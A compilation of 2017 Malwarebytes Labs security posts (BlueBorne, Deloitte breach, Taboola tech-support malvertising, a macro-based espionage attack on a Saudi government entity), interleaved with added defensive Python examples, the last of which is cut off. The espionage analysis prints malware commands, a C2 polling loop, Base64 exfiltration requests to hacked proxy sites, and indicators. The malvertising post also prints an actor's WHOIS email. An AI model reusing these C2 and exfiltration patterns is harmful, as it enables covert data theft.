Segura revealed a questionable trend on the rise where website publishers would mine for cryptocurrencies from user machines while on their sites. He also pictured a scenario where mining is also tied with malvertising. Scammers abused Taboola, a global discovery platform, to redirect users from a promoted story to a tech support scam page.

Segura, together with David Sánchez, wrote about an espionage attack against the Saudi Arabia government, in an effort to let readers understand how the malware entered its target systems and kept in touch with its C&C.

Below are notable news stories and security-related happenings from last week:

Latest updates for Consumers
  • Responsible Vulnerability Disclosure Is Becoming An International Norm. “More and more countries are joining the United States in adopting a policy of weighing the pros and cons of responsible vulnerability disclosure, as the public calls for more clarity regarding intelligence agencies and their supposed hoarding of previously undiscovered software flaws” (Source: Cyberscoop)
  • Mobile Stock Trading App Providers Unresponsive to Glaring Vulnerabilities. “Researchers from IOActive today published a report describing the scope of the security issues. More concerning, however, is the lack of response from the respective financial firms. Of the 21 apps in question, researcher Alejandro Hernandez said he sent detailed private disclosures to 13 brokerage firms and only two had acknowledged the reports as of Monday.” (Source: Threatpost)
  • XPCTRA Malware Steals Banking And Digital Wallet User’s Credentials. “The malspams used in the campaign try to induce the victim to open a supposed bank bill link. It actually leads to the download of the XPCTRA dropper, that is, the part of the malware responsible for environment recognition and downloading new components. Once executed, it initiates a connection with an Internet address to download other malware parts responsible for later malicious actions.” (Source: SANS Internet Storm Center)
  • Android Unlock Patterns Are A Boon For Shoulder Surfing Attackers. “The ‘swiping’ unlock patterns typical for Android devices are considerably easier for attackers to discern than PIN combinations. In fact, after only one observation of a user entering the pattern, 64% of shoulder surfing attackers will be able to reproduce it, a group of researchers from the US Naval Academy and the University of Maryland Baltimore County has found.” (Source: Help Net Security)
  • Police: Buying Fake Goods Online Can Lead to ID Theft. “The City of London Police has shut down 28,000 websites selling counterfeit goods over the past three years, many of which were registered with stolen identities, it has revealed. Over 4000 sites were created using the identities of unsuspecting members of the public, according to the force, which released the figures as part of a new awareness campaign.” (Source: Infosecurity Magazine)
  • No, Facebook Spies Aren’t Secretly ‘Following Me’, It’s A Hoax. “According to the nonsense debunkers over at Snopes, the hoax debuted in January 2017.” (Source: Sophos’s Naked Security Blog)
  • Sudden Rise Detected in Faceliker Malware That Manipulates Facebook ‘Likes’. “The Faceliker malware is not new, being spotted years back, and is a generic detection that describes malware that takes over users’ browsers and uses JavaScript code to perform click-jacking, giving Facebook “likes” to content received from a central command and control server.” (Source: Bleeping Computer)
  • Duo Security Discovers Apple Mac Computers Unprotected from Malicious Firmware Vulnerabilities. “The report shows Mac users who have updated to the latest operating system (OS) or downloaded the most recent security update may not be as secure as they originally thought. A Duo Labs analysis of over 73,000 real-world Mac systems gathered from users across industries found the Extensible Firmware Interface (EFI) in many popular Mac models was not actually receiving the security updates users thought. This left users susceptible to previously disclosed vulnerabilities such as Thunderstrike 2 and the recent WikiLeaks Vault 7 data dumps that detail attacks against firmware.” (Source: Duo Security)
  • Uber London Ban Sees Rise In Malicious Taxi Apps. “Security researchers have warned of a rise in malicious apps masquerading as legitimate taxi-hailing services, as cyber-criminals look to capitalize on Transport for London (TfL)’s recent decision to ban Uber.” (Source: Infosecurity Magazine)
Latest updates for Businesses
  • Criminal Hacking: Top Technology Risk To Health, Safety And Prosperity. “Americans believe criminal hacking into computer systems is now a top risk to their health, safety and prosperity. Criminal hacking, a new ESET survey finds, outranks other significant hazards, including climate change, nuclear power, hazardous waste, and government surveillance.” (Source: Help Net Security)
  • Three Out Of Four DDoS Attacks Target Multiple Vectors. “Three out of every four DDoS attacks employed blended, multi-vector approaches in the second quarter of 2017, according to Nexusguard. The quarterly report, which measured more than 8,300 attacks, demonstrated that hackers continued to rely on volumetric attacks to overwhelm system resources.” (Source: Help Net Security)
  • Why Your Business Must Care About Privacy. “The current conversation often pits privacy against security, both in consumer and enterprise settings. This is especially true in the debate over whether mobile encryption is essential for the average user. However, not wanting to have personal information shared, acted on, or used by anyone without permission should be seen as a universal right.” (Source: Dark Reading)
  • Shocker? Companies Still Unprepared To Deal With Ransomware. “Companies and government agencies are overwhelmed by frequent, severe ransomware attacks, which have now become the #1 cyber threat to organizations, according to Crowd Research Partners.” (Source: Help Net Security)
  • Healthcare Sector Reports Greatest Number Of Security Incidents. “McAfee Labs saw healthcare surpass public sector to report the greatest number of security incidents in Q2, while the Faceliker Trojan helped drive quarter’s 67% increase in new malware samples from the social media landscape.” (Source: Help Net Security)

Safe surfing, everyone!

The Malwarebytes Labs Team

The post A week in security (September 25 – October 01) appeared first on Malwarebytes Labs.


BlueBorne – Bluetooth’s airborne influenza

Malwarebytes - Fri, 09/29/2017 - 15:00

Armis Labs has discovered a new attack vector that targets any device that has Bluetooth capability. This includes mobile, desktop, and IoT — roughly accounting for 8.2 billion devices. All operating systems are susceptible — Android, iOS, Windows, and Linux. Dubbed BlueBorne, it exposes several vulnerabilities in the Bluetooth technology. These vulnerabilities open up the potential to perform an array of malicious attacks. Some of which, stated by Armis, are as follows:

  • Take control of devices
  • Access corporate data and networks
  • Break into secure networks that use air gap security measures
  • Spread malware to devices that are within range of an infected device

BlueBorne does not require Bluetooth devices to be paired to other devices to be exploited. Even worse, devices are susceptible even when Bluetooth is in non-discoverable mode.

The ease of exploitation

What exactly does it take to exploit these newfound Bluetooth vulnerabilities? As noted in the Armis Labs BlueBorne whitepaper, the first step is to steal the BD_ADDR (Bluetooth Device Address). This is a hardcoded 48-bit MAC address of the Bluetooth device. Stealing the BD_ADDR of a Bluetooth device, especially when it is set to non-discoverable, used to be considered a feat. With the introduction of new Bluetooth “sniffing” hardware, this has become a lot easier. One such device is the open source hardware Ubertooth, which plugs into a USB port of a computer. Simply be within range with the Ubertooth plugged in, and it will grab any Bluetooth traffic from the air. With the help of some other monitoring tools to analyze the traffic — voilà — you have BD_ADDRs.

Spreading malware via Bluetooth

One of the more intriguing attacks is the potential to propagate malware using BlueBorne vulnerabilities. More specifically, through mobile devices.

The only way I could hypothesize this happening is through an attack using a list of collected BD_ADDRs and then creating a malicious app which scans for those addresses. Any device within range on the list becomes a target. Using the BlueBorne vulnerabilities to propagate itself, the malicious app transfers to the target device. Keep in mind the user of the target device would need to accept installing the malicious app as well.

All this isn’t impossible, but unlikely with the limitation of requiring a list of BD_ADDRs. Now if a mobile device could steal BD_ADDRs for itself — which it can’t at this point — then we should start worrying.

So how bad is it?

The work done by Armis Labs to present the BlueBorne vulnerabilities is extremely valuable to the security industry. It highlights the need for improved Bluetooth security. I applaud them for their hard work in this endeavor.

The introduction of sniffing hardware like Ubertooth and the creation of other open-source tools to analyze the collected traffic, like Kismet, have taken down the toughest barrier for hackers — collecting the BD_ADDR. With this exposure, I agree with Armis Labs’ prediction — we will continue to see more Bluetooth vulnerabilities arise.

The requirement of having to be within Bluetooth range creates a limitation to BlueBorne. I believe this limitation will isolate it to more targeted attacks — most likely against specific companies. In that scenario, a spear phishing attack would be much easier to carry out and wouldn’t require being physically within Bluetooth range. Therefore, I’m skeptical that we will see BlueBorne implemented in a real-world attack.

Disabling Bluetooth

Bluetooth, by default, is enabled. If you don’t use Bluetooth (i.e., you don’t have any devices paired), it’s best to disable it. If you do use your Bluetooth, disabling it when not in use is the most secure option against BlueBorne. However, many use their mobile devices to pair with their vehicle’s handsfree unit. Ideally, remembering to enable/disable Bluetooth depending on whether you’re driving or not is the best option. Not as ideal, and more likely, you will forget to enable Bluetooth before starting to drive — myself included. Therefore, you have to weigh what is more of a threat: a BlueBorne attack, or looking at your phone to enable Bluetooth WHILE driving? Just something to think about.

The post BlueBorne – Bluetooth’s airborne influenza appeared first on Malwarebytes Labs.


Deloitte breached by hackers for months

Malwarebytes - Thu, 09/28/2017 - 16:00

On September 25, 2017, Deloitte announced that they detected a breach of the firm’s global email server via a poorly secured admin email in March of this year. Further, the attackers most likely had control of the server since November of 2016. Deloitte’s initial statement indicated that only six of their consultancy clients were impacted by the breach, but insider sources later disclosed to the media that the attack most likely compromised every admin account at the firm. The startling severity of the breach has brought attention to Deloitte’s other cybersecurity practices, which, as we can see here with a likely Active Directory server, are not ideal. (There are valid applications for self-signed certificates, but the larger problem here is that the server is exposed to the outside internet at all, running unnecessary services.)

An admin account subversion is not very shocking, given that a significant number of Deloitte email accounts can be found on paste sites, most with low-complexity passwords (suggesting the firm has minimal password policies), and given the firm’s lack of a threat intelligence capacity to identify and recover leaked PII. A quick scan of pastebin.com showed a significant amount of Deloitte data from various locations, going back five years. A portion of those pastes were email credentials – the primary breach vector – as shown below.

What you should do if you’re a Deloitte cybersecurity client
  • First and foremost, take a quick inventory of your own corporate email accounts that have corresponded with the company. Accounts with normal network privileges could benefit from a password reset. Those with elevated privileges should be reviewed for accesses and unusual activity. It’s not unheard of for attackers to breach an ancillary services firm in furtherance of an attack on the main target.
  • Do Deloitte consultants have accounts on your network? You can review outbound traffic on these hosts to make sure it matches with their work role.
  • Maintain your own threat intelligence capacity to identify work product that might be leaked on paste sites. Enormous breaches like this one are quickly monetized on the dark web, with data eventually filtering out for public use. You can’t prevent third party access to your data, but you can find it in a timely manner, and serve a takedown request accordingly.
  • Don’t repeat their mistakes. Best practices for enterprise security are widely written about and publicly available. While security is generally seen as a cost center, it would be more accurate to describe it as an investment in public trust. And without trust, how profitable could your enterprise possibly be?
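The first checklist item above (inventory the accounts that corresponded with the breached vendor, reset the ordinary ones, review the privileged ones) is easy to script from an outbound mail-log export. The following is an added example written for this page, not code from the Malwarebytes post: the log format, the `corp.example`/`vendor.example` domains and the privileged-account list are all constructed for illustration, so adapt the regular expression to whatever your mail gateway actually emits.

```python
"""Inventory which internal accounts corresponded with a breached third party.

Added example (not from the Malwarebytes post). Given an export of outbound
mail-log lines and a list of privileged accounts, sort the internal senders
into "reset password" versus "review access and activity" buckets, as the
post's first checklist item suggests. Log format, domain names and accounts
are constructed for illustration.
"""
import re
from collections import defaultdict

# Constructed sample: one line per delivered message, "sender -> recipient".
SAMPLE_MAIL_LOG = """\
2017-09-26 08:12:01 alice@corp.example -> consultant.one@vendor.example status=sent
2017-09-26 08:15:44 bob@corp.example -> helpdesk@corp.example status=sent
2017-09-26 09:02:10 dc-admin@corp.example -> consultant.two@vendor.example status=sent
2017-09-27 11:40:03 alice@corp.example -> consultant.two@vendor.example status=sent
2017-09-27 12:00:00 carol@corp.example -> press@news.example status=sent
2017-09-28 07:30:59 BOB@corp.example -> Consultant.One@vendor.example status=sent
"""

# Constructed: accounts that hold elevated rights in the directory.
PRIVILEGED_ACCOUNTS = {"dc-admin@corp.example"}

LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+) (?P<sender>\S+) -> (?P<recipient>\S+) status=(?P<status>\S+)$"
)


def parse_mail_log(text):
    """Yield (timestamp, sender, recipient) for each well-formed line."""
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if m:  # skip malformed lines rather than abort the whole inventory
            yield m["ts"], m["sender"].lower(), m["recipient"].lower()


def vendor_correspondents(text, vendor_domain):
    """Map each internal sender to the set of vendor addresses it wrote to."""
    contacts = defaultdict(set)
    suffix = "@" + vendor_domain.lower()
    for _, sender, recipient in parse_mail_log(text):
        if recipient.endswith(suffix):
            contacts[sender].add(recipient)
    return dict(contacts)


def triage(text, vendor_domain, privileged):
    """Split correspondents into the two actions the checklist recommends."""
    contacts = vendor_correspondents(text, vendor_domain)
    privileged = {p.lower() for p in privileged}
    return {
        "reset_password": sorted(a for a in contacts if a not in privileged),
        "review_access": sorted(a for a in contacts if a in privileged),
    }


if __name__ == "__main__":
    print(triage(SAMPLE_MAIL_LOG, "vendor.example", PRIVILEGED_ACCOUNTS))
```

Addresses are lower-cased before comparison so that a mail client that capitalises the local part does not produce a second, phantom account; the privileged list is the only input you have to maintain by hand.
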
Conclusion

Third-party breaches are occurring at an accelerating rate. While outsourcing data security to a popular vendor checks off the “security box,” there is no good substitution for in-house expertise that knows the business as well as security. Good security now is an investment in stable capital growth later. Building in-house talent to facilitate that growth can put you ahead of the curve before the next breach happens.

The post Deloitte breached by hackers for months appeared first on Malwarebytes Labs.


Tech support scammers abuse native ad and content provider Taboola to serve malvertising

Malwarebytes - Thu, 09/28/2017 - 14:58

A large number of publishers – big and small – are monetizing their sites by selling space for companies that provide so-called native advertising, cited as more effective and engaging than traditional banner ads.

Indeed, on a news or entertainment site, users are more inclined to click on links and articles thinking that they are one and the same, not realizing that those are actually ‘sponsored’ and tied to various third-party providers.

Rogue advertisers have realized this unique opportunity to redirect genuine traffic towards their own infrastructure where they can subject their audience to whatever content they wish.

Case in point, we caught this malvertising incident on MSN.com, the Microsoft web portal that attracts millions of unique visitors. While clicking on a story promoted by Taboola – a leading global discovery platform which Microsoft signed a deal with in 2016 – we were redirected to a tech support scam page. The warning claims that our computer has crashed and that we must call a number for immediate assistance.

Figure 1: Automatic redirection from click on promoted story to scam page

The fraudulent page cannot be closed normally because it uses code that repeats the warning indefinitely. Unfortunately, this is enough to scare many folks and trick them into calling what they think is Microsoft support. Instead, they will be dealing with fake technicians whose goal is to extort hundreds of dollars from them.

Decoy news page hides real intentions

Rogue actors typically start creating content just like any other advertiser would and build up a profile. After all, they want to appear genuine in order to game the system with ‘hot’ content.

What’s determined as hot can be derived from real or shocking news. The point is to do a little bit of market study on what the most searched for stories or keywords are in order to attract traffic.

In this malvertising example, if we review the sequence of events, we realize that the scammer created a bogus news site (infinitymedia[.]online) which does have actual content but is performing conditional redirects, also known as ‘cloaking’.

Figure 2: Traffic view showing temporary hop via decoy news site

A conditional redirect is usually a server-side mechanism that profiles the user and returns a particular response. For instance, if the server determines that a bot or crawler is making a request, it may in turn either deny it or simply serve the expected content (decoy). Similarly, if the user is running Internet Explorer, is from North America and their IP address appears to have hit the server for the first time, they may receive a scammy page instead.
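Because the profiling happens server-side, the only way to see cloaking from the outside is to request the same URL as several different visitors and compare where each one lands. The following is an added example written for this page, not code from the Malwarebytes post: it performs no network access and works on constructed redirect chains whose hostnames are placeholders under the reserved `.invalid` TLD, arranged to mirror the behaviour described above (crawlers and repeat visitors get the decoy article, a first-time Internet Explorer visitor from North America gets a 302 to the scam page).

```python
"""Spot conditional redirects ("cloaking") by comparing what different client
profiles receive for the same URL.

Added example, not code from the Malwarebytes post. It performs no network
access: the redirect chains below are constructed to mirror the behaviour the
post describes. Hostnames are placeholders under the reserved .invalid TLD.
"""
from collections import Counter
from urllib.parse import urlsplit

# Constructed: for each probe profile, the hops observed as (status, url),
# where status is what the request to url returned; the last hop is the page
# the visitor actually rendered.
PROBES = {
    "googlebot": [
        (200, "http://decoy-news.invalid/story"),
    ],
    "ie11-us-first-visit": [
        (302, "http://decoy-news.invalid/story"),
        (200, "http://scam-page.invalid/alert.html"),
    ],
    "ie11-us-repeat-visit": [
        (200, "http://decoy-news.invalid/story"),
    ],
    "chrome-eu-first-visit": [
        (200, "http://decoy-news.invalid/story"),
    ],
}


def final_destination(chain):
    """Host of the last hop, i.e. what the visitor actually saw."""
    status, url = chain[-1]
    if status != 200:
        return None  # chain did not complete; counts as its own outcome
    return urlsplit(url).netloc.lower()


def redirect_count(chain):
    """Number of 3xx answers along the chain."""
    return sum(1 for status, _ in chain if 300 <= status < 400)


def detect_cloaking(probes):
    """Flag cloaking when profiles land on different hosts.

    The host most profiles reach is taken as the 'public' face of the URL;
    every profile steered elsewhere is reported with its redirect count, so
    the analyst can see which audience is being singled out.
    """
    if len(probes) < 2:
        raise ValueError("need at least two profiles to compare")
    landings = {name: final_destination(chain) for name, chain in probes.items()}
    majority, _ = Counter(landings.values()).most_common(1)[0]
    outliers = {
        name: {"landed_on": host, "redirects": redirect_count(probes[name])}
        for name, host in landings.items()
        if host != majority
    }
    return {"cloaked": bool(outliers), "public_face": majority, "outliers": outliers}


if __name__ == "__main__":
    print(detect_cloaking(PROBES))
```

In practice each profile would be a separate fetch (different User-Agent, egress region and a fresh source IP), recorded with its full hop list; the comparison logic stays the same. The majority vote is deliberate: a cloaked page shows its decoy to almost everyone, so the rare outlier is the interesting one.
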

The point is that it’s trivial to play a Dr. Jekyll and Mr. Hyde kind of game and serve the content you want. The fraudulent advertiser did create various pages with impactful keywords (potentially for Search Engine Optimization purposes) and can also use those stories as a decoy:

Figure 3: Stories designed for click-bait

To get back to this malvertising incident on MSN, the user was conditionally redirected to another site (the tech support scam page), and never saw the content they were looking for.

Figure 4: The 302 redirect call from the fake news site to the scam page

To show that this was no mere ‘coincidence’, we can look at the ownership of the ‘news’ site (infinitymedia[.]online) and see how it links to the tech support domain name (4vxadfcjdgbcmn[.]ga). A WHOIS lookup for infinitymedia[.]online returns the following information:

Domain Name: INFINITYMEDIA.ONLINE
Creation Date: 2017-05-23T05:14:50.0Z
Registrar: PDR Ltd. d/b/a PublicDomainRegistry.com
Registrant Name: bhanu
Registrant Country: IN
Registrant Email: bhanutomar90nk@gmail.com

A cursory review using RiskIQ’s PassiveTotal of recently created domains using the same email address shows a tendency for this actor to register tech support scams domains:

Figure 5: Domains recently registered by the actor behind the decoys news sites

Still, we don’t have a clear connection to 4vxadfcjdgbcmn[.]ga which does not have an identifiable registrant. Indeed, the .GA Top Level Domain (TLD) is comprised of free domain names and their registrant is… Gabon TLD B.V.

However, this particular actor made the mistake of reusing the same host server for domains he had created before. For example, if we take micro-soft-system-alert2[.]online which is registered to his email address, we notice that it resolves to 108.167.146.132, a server full of tech support scams and phishing sites, including the one used in this particular malvertising attack, namely 4vxadfcjdgbcmn[.]ga.

Figure 7: Connecting the fake news sites to the tech support domain

Further inspection of other properties tied to bhanutomar90nk@gmail.com shows similar bogus ‘news’ sites:

hollywoodreporter[.]online
latestnynews[.]online
theonlytimesnews[.]xyz
uk-times-news[.]xyz
unitedtimesnews[.]xyz
247breakingnews[.]xyz
247-breakingnews[.]xyz
thenewyorktimenews[.]xyz
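The pivot just walked through (registrant e-mail first, then shared hosting to reach the anonymously registered .ga domain) is mechanical enough to script. Below is an added example written for this page, not code from the Malwarebytes post. The WHOIS excerpts and the passive-DNS table are constructed around the values quoted above: the first WHOIS record is the one shown for infinitymedia[.]online, the shared address 108.167.146.132 and the domains are the post's indicators, while the address given for infinitymedia[.]online itself is a TEST-NET placeholder because the post does not state it. Indicators stay defanged as in the post and are refanged only inside the helpers.

```python
"""Pivot from one scam domain to related infrastructure via registrant e-mail
and shared hosting, the way the post links infinitymedia[.]online to
4vxadfcjdgbcmn[.]ga.

Added example, not code from the Malwarebytes post. WHOIS excerpts and
passive-DNS resolutions are constructed around the values the post quotes;
the address for infinitymedia[.]online is a TEST-NET placeholder.
"""
import re


def refang(indicator):
    """Turn the defanged 'example[.]com' form back into a plain hostname."""
    return indicator.replace("[.]", ".").lower()


# WHOIS fields of interest, in the flattened "Key: value Key: value" layout.
FIELDS = ["Domain Name", "Creation Date", "Registrar", "Registrant Name",
          "Registrant Country", "Registrant Email"]
_ALT = "|".join(re.escape(f) for f in FIELDS)
FIELD_RE = re.compile(rf"(?P<key>{_ALT}):\s*(?P<val>.*?)(?=\s*(?:{_ALT}):|$)", re.S)


def parse_whois(text):
    """Return {field: value} for the known fields; missing fields are absent."""
    return {m["key"]: m["val"].strip() for m in FIELD_RE.finditer(text)}


# Constructed WHOIS excerpts (the first matches the record quoted in the post).
WHOIS_RECORDS = [
    "Domain Name: INFINITYMEDIA.ONLINE Creation Date: 2017-05-23T05:14:50.0Z "
    "Registrar: PDR Ltd. d/b/a PublicDomainRegistry.com Registrant Name: bhanu "
    "Registrant Country: IN Registrant Email: bhanutomar90nk@gmail.com",
    "Domain Name: MICRO-SOFT-SYSTEM-ALERT2.ONLINE Registrant Name: bhanu "
    "Registrant Country: IN Registrant Email: bhanutomar90nk@gmail.com",
    # Free .ga domains expose only the registry operator, no real registrant.
    "Domain Name: 4VXADFCJDGBCMN.GA Registrant Name: Gabon TLD B.V. Registrant Email: ",
    "Domain Name: UNRELATED-SITE.EXAMPLE Registrant Email: someone@example.org",
]

# Constructed passive-DNS view: hostname -> IPs it has resolved to.
PASSIVE_DNS = {
    "infinitymedia[.]online": {"203.0.113.10"},          # placeholder address
    "micro-soft-system-alert2[.]online": {"108.167.146.132"},
    "4vxadfcjdgbcmn[.]ga": {"108.167.146.132"},
    "unrelated-site[.]example": {"198.51.100.7"},
}


def pivot(seed, whois_records, passive_dns):
    """Expand a seed domain into a cluster by registrant e-mail, then by IP."""
    records = {}
    for text in whois_records:
        rec = parse_whois(text)
        records[rec["Domain Name"].lower()] = rec
    resolutions = {refang(h): ips for h, ips in passive_dns.items()}

    seed_host = refang(seed)
    email = records.get(seed_host, {}).get("Registrant Email", "").lower()
    # Hop 1: every domain registered with the same (non-empty) e-mail address.
    if email:
        cluster = {d for d, r in records.items()
                   if r.get("Registrant Email", "").lower() == email}
    else:
        cluster = {seed_host}  # anonymous registrant: pivot on hosting only
    # Hop 2: every other host sharing an IP with something in the cluster.
    shared_ips = set().union(*(resolutions.get(d, set()) for d in cluster))
    co_hosted = {h for h, ips in resolutions.items() if ips & shared_ips} - cluster
    return {
        "registrant_email": email,
        "same_registrant": sorted(cluster),
        "shared_ips": sorted(shared_ips),
        "co_hosted": sorted(co_hosted),
    }


if __name__ == "__main__":
    print(pivot("infinitymedia[.]online", WHOIS_RECORDS, PASSIVE_DNS))
```

Starting from the .ga domain works too: with no registrant e-mail the cluster is just the seed, and the hosting hop still surfaces micro-soft-system-alert2[.]online. Shared hosting on its own is weak evidence (a busy shared server co-hosts plenty of innocent sites), which is why the example reports the two hops separately rather than merging them into one list.
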

There is no doubt that this actor has very clear intentions and has turned high-profile stories into a click-bait lead generation tool for tech support scams.

Banner ads versus native advertising

Banner ads can load third-party tags that are laced with malicious content, not to mention promoting anything that is outrageous (regardless of whether it has anything to do with the current content) and is bound to get clicks. For instance, there have been many documented instances of fake celebrity deaths used for click bait purposes on Facebook.

But promoted stories aren’t necessarily that different (or safer) when they take the user to a third-party website that is in the complete control of an advertiser, good or bad.

Users should be aware that even on a trusted platform, they should watch what they click on and be careful of sensationalist stories that may be used as click bait.

We reported the fraudulent advertiser to Taboola which told us they had opened an internal review of this particular vendor. We reached back with more questions regarding how Taboola deals with click bait and fake news, whether they scan articles for malware or scams, and finally if they had a direct point of contact to report security-related issues. However, we only received a response for the fake news problem, which you can read more about here.

The post Tech support scammers abuse native ad and content provider Taboola to serve malvertising appeared first on Malwarebytes Labs.


Elaborate scripting-fu used in espionage attack against Saudi Arabia Government entity

Malwarebytes - Wed, 09/27/2017 - 01:06

This post was co-authored by David Sánchez and Jérôme Segura

We recently came across a campaign targeting a Saudi Arabia Government entity via a malicious Word document which at first reminded us of an attack we had previously described on this blog.

In our previous research, we detailed how an information stealer Trojan was deployed via a Word macro, in order to spy on its victims (various parts of the Saudi Government). The stolen information was transmitted back to the threat actors’ infrastructure in an encrypted format.

This new threat also uses a macro to infect the target’s computer, but rather than retrieving a binary payload, it relies on various scripts to maintain its presence and to communicate via hacked websites, acting as proxies for the command and control server.

The malicious script fingerprints the victim’s machine and can receive any command that will run via PowerShell. In this blog post, we will describe the way this threat enters the system and maintains its presence while constantly communicating with its command and control server.

Covert delivery and persistence

The decoy document bears the logo of one of the branches of the Saudi Government and prompts the user to “Enable Content” stating that the document is in protected view (which is actually true).

A high-level summary static analysis of this document reveals that it includes a macro as well as several Base64 encoded strings.

OLE:MAS--B-- target.doc (Flags: M=Macros, A=Auto-executable, S=Suspicious keywords, B=Base64 strings)

One of the first routines the malicious VBScript performs is to disable or lower security settings within Microsoft Excel and Word by altering corresponding registry keys with values of “1”, meaning: Enable All (ref).

The VBScript also fingerprints the victim for their IP address by querying the Win32_NetworkAdapterConfiguration class:

It then proceeds to retrieve a stream of data from the Pastebin website using its own proxy:

The data is converted into two scripts, a PowerShell and a Visual Basic one, the latter being used for persistence on the infected machine via two different hook points: a Run key in the registry and a scheduled task.

This VBScript is really a launcher for the more important PowerShell script, and both are stored as hidden system files under the Documents folder using the following commands:

attrib +s +h "C:\Users\public\documents\NTSTATS.ps1"
attrib +s +h "C:\Users\public\documents\NTSTATS.vbs"

Espionage and exfiltration

That PowerShell script also has the same instructions to lower Office’s security settings but more importantly is used to exfiltrate data and communicate with the command and control server.

A unique ID is stored on the victim’s machine (in the same folder as the scripts) in a file called [username].key and is used to receive instructions via a server located in Germany (although it appears to be down at the time of writing).

GET http://144.76.109[.]88/al/?action=getCommand&id=[user ID] HTTP/1.1

A function called getKey retrieves the unique ID from the .key file stored on the local hard drive to register the machine as a new victim. If the key file does not exist, it queries for additional system information (computer name, IP address, OS version) and then creates that key (Set-Content $keypath $id).

Another function called getCommand uses the key as a parameter to then contact the C2. This command runs every 5 minutes:

while ($true){
  getCommand $key
  start-sleep -Seconds 300
}

The malicious script can receive and run any command the attackers want via PowerShell, making this a very powerful attack.

The eventual exfiltration of data is done via several hardcoded websites acting as a proxy via the sendResult function:

The transmission of data is done via Base64 encoded strings, one for the user id (.key file) and one for the exfiltrated data.

GET /wp-content/wp_fast_cache/wmg-global.com/Senditem.php?c=[removed]== HTTP/1.1
Host: www.wmg-global.com
Connection: Keep-Alive

The parameters passed on the URL in the Base64 format:

action=saveResult&id=[removed]&cmd=2&chunk=last&res=[removed]=

Decoding the value in the variable “res”, we get the following info.

Connection-specific DNS Suffix . : [removed]
Description . . . . . . . . . . . : [removed]
Physical Address. . . . . . . . . : [removed]
DHCP Enabled. . . . . . . . . . . : [removed]
Autoconfiguration Enabled . . . . : [removed]

Script based attack and protection

This attack is very different from the typical malicious spam we see on a daily basis, blasting Locky or some banking Trojan. Indeed, there is no malicious binary payload (although one could be downloaded by the C2) which makes us think the attackers are trying to keep a low profile and remain on the system while collecting information from their target.

Relying on scripts as part of the attack chain and ongoing infection is an interesting concept because of how modular it is, and because it is more likely to stay undetected by antivirus engines. At the same time, the attack has to rely on various encoding techniques because it can’t make use of a packer the way a traditional malware binary would.

Malwarebytes users are already protected against this attack thanks to our signature-less engine.

Indicators of compromise

Scripts:

C:\Users\public\documents\NTSTATS.ps1
C:\Users\public\documents\NTSTATS.vbs

C2:

144.76.109[.]88/al/

Proxies:

larsson-elevator[.]com/plugins/xmap/com_k2/com.php?c=
spearhead-training[.]com/action/point2.php?c=
itcdubai[.]net/action/contact_gtc.php?c=
taxconsultantsdubai[.]ae/wp-content/themes/config.php?c=
projac.co[.]uk/Senditem.php?c=
wmg-global[.]com/wp-content/wp_fast_cache/wmg-global.com/Senditem.php?c=
romix-group[.]com/modules/mod_wrapper/Senditem.php?c=
heartmade[.]ae/plugins/content/contact/Senditem.php?c=
arch-tech[.]net/components/com_layer_slider/Senditem.php?c=
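Two things a responder wants from the material above are a way to match web-proxy logs against the proxy indicators, and a way to unwrap a matched request so the exfiltrated data can be read: the `c` parameter is Base64, and inside it the `id` and `res` values are Base64 again. The following added example (written for this page, not code from the Malwarebytes post) does both over constructed proxy log lines. The encoded payload is built in the file from a constructed ipconfig-style text so the decoder can be exercised offline; the hostnames in the indicator list are the post's, kept defanged and refanged by the matcher; the log format is made up.

```python
"""Match proxy-log lines against the post's proxy indicators and decode the
two Base64 layers of a sendResult request.

Added example, not code from the Malwarebytes post. Log lines and the encoded
payload are constructed here; the indicator list is the post's IoC section.
"""
import base64
import re
from urllib.parse import unquote, urlsplit

PROXY_IOCS = [  # hostname/path prefixes quoted in the post's IoC section
    "larsson-elevator[.]com/plugins/xmap/com_k2/com.php?c=",
    "spearhead-training[.]com/action/point2.php?c=",
    "itcdubai[.]net/action/contact_gtc.php?c=",
    "taxconsultantsdubai[.]ae/wp-content/themes/config.php?c=",
    "projac.co[.]uk/Senditem.php?c=",
    "wmg-global[.]com/wp-content/wp_fast_cache/wmg-global.com/Senditem.php?c=",
    "romix-group[.]com/modules/mod_wrapper/Senditem.php?c=",
    "heartmade[.]ae/plugins/content/contact/Senditem.php?c=",
    "arch-tech[.]net/components/com_layer_slider/Senditem.php?c=",
]
IOC_PREFIXES = [ioc.replace("[.]", ".") for ioc in PROXY_IOCS]


def _b64(text):
    """Encoder used only to build the constructed sample below."""
    return base64.b64encode(text.encode()).decode()


# Constructed victim output in the layout the post shows (values are fake).
SAMPLE_RESULT = (
    "Connection-specific DNS Suffix . : corp.example\n"
    "Description . . . . . . . . . . . : Test Adapter\n"
    "Physical Address. . . . . . . . . : 00-11-22-33-44-55\n"
)
SAMPLE_INNER = ("action=saveResult&id=" + _b64("victim-0001")
                + "&cmd=2&chunk=last&res=" + _b64(SAMPLE_RESULT))

# Constructed proxy log: "<epoch> <client> <method> <url> <status>".
SAMPLE_PROXY_LOG = [
    "1506500000.123 10.0.0.5 GET http://www.wmg-global.com/wp-content/wp_fast_cache/"
    "wmg-global.com/Senditem.php?c=" + _b64(SAMPLE_INNER) + " 200",
    "1506500010.456 10.0.0.5 GET http://www.example.org/index.html 200",
    "1506500020.789 10.0.0.9 GET http://itcdubai.net/action/contact_gtc.php?c=not-base64!! 200",
]
LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>\S+) (?P<url>\S+) (?P<status>\d+)$")


def _b64decode(value):
    """Strictly decode one Base64 layer; None if it is not valid Base64."""
    try:
        return base64.b64decode(unquote(value), validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError
        return None


def decode_exfil(url):
    """Unwrap c=<Base64(action=...&id=<Base64>&...&res=<Base64>)>.

    Returns the inner parameters with id/res decoded, or None if the URL
    carries no decodable c parameter. The inner string is split by hand:
    parse_qs would turn the '+' of Base64 into spaces.
    """
    m = re.search(r"(?:^|&)c=([^&]+)", urlsplit(url).query)
    if not m:
        return None
    inner = _b64decode(m.group(1))
    if inner is None:
        return None
    params = {}
    for pair in inner.split("&"):
        key, _, value = pair.partition("=")
        params[key] = value
    for field in ("id", "res"):
        if field in params:
            decoded = _b64decode(params[field])
            params[field] = decoded if decoded is not None else params[field]
    return params


def match_ioc(url):
    """Return the indicator a URL matches, ignoring scheme and a leading www."""
    parts = urlsplit(url)
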